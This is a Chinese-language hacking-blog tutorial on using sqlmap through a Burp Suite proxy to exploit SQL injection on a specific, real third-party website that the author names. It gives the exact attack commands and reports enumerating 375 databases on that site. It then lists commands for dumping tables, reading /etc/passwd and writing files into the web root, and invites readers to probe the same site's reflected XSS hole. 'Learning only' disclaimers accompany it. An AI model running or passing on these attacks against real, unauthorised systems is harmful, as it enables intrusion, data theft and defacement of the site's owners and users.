前言
进入正题前!!!!!禁止破坏!!!!插播广告!!!(物色天命主角,有意者请联系作者,作者24小时工作)
使用工具:
- 1.sqlmap
- 2.burpsuite
目标:
https://bz.u2006.com/HYX10764/mater.php?id=5
ps– !!!真实站点,请勿搞破坏如有不然,本人概不负责。仅供学习交流!!!
使用sqlmap前明确目标。使用前,手工注入测试,测试感觉有注入点直接上工具。
使用指令:
python sqlmap.py -u https://bz.u2006.com/HYX10764/mater.php?id=5
这里提示我们无法建立ssl连接,ssl具体是什么咱就不过谈论。无法建立连接,我采用的办法是通过走burpsuite的代理来解决,当然也还有其他办法咱不过谈论!!
接着我们使用参数–force-ssl这里是告诉我们的sqlmap这是htpps服务,然后在使用–proxy指定代理
全部指令如下:
python sqlmap.py -u https://bz.u2006.com/HYX10764/mater.php?id=5 --force-ssl --proxy http://127.0.0.1:8080
!!注意这里的地址和端口要和burpsuite一样。
如图:
中途要是询问y/n直接一路y就好了懒一点的话可以再指令后面加上–batch参数,表示一切默认执行。第一次扫描时间比较长请耐心等待
如出现如图:
表示注入方式有三种,咱就一般也不管。反正有就行了,有注入点,那就好办了。
直接输入指令:
sqlmap.py -u https://bz.u2006.com/HYX10764/mater.php?id=5 --force-ssl --proxy http://127.0.0.1:8080 --dbs 查看所有库名
这里显示库有375个,至此咱就结束了爆出库名就行,仅做研究!!!一切违法行为与本人无关!!!
我给兄弟们总结了一下常用参数:
- -purge清楚缓存重新跑
- sqlmap -u <目标URL> –banner 查看数据库版本
- sqlmap -u <目标URL> –dbs 查看可以使用的数据库名
- sqlmap -u <目标URL> –current-user 查看当前用户
- sqlmap -u <目标URL> –current-db 获取当前数据库名称
- sqlmap -u <目标URL> –banner 查看数据版本
- sqlmap -u <目标URL> –tables -D <数据库名称> 获取指定数据库下的表
- sqlmap -u <目标URL> –dump -D <数据库名称> -T <表名> 获取表中的数据
- sqlmap -u <目标URL> –dump -D <数据库名称> -T <表名> -o <输出文件名> 下载表里面的内容到指定位置
- sqlmap -u <目标URL> –columns -D <数据库名称> -T <表名> 获取指定数据库下面的表的字段
- sqlmap -u <目标URL> –file-read “/etc/passwd” 查看网站目录文件
sqlmap -u <目标URL> –file-write /test/test.txt –file-dest /var/www/html/1.txt写入网站目录文件
!!!!禁止破坏!!!!
后记练手小项目
此上网站存在xss反射型漏洞,有兴趣自行研究,禁止破坏!!!
© 版权声明
1、本网站名称:
X黑手网
2、本站永久网址:https://www.xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
2、本站永久网址:https://www.xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
暂无评论内容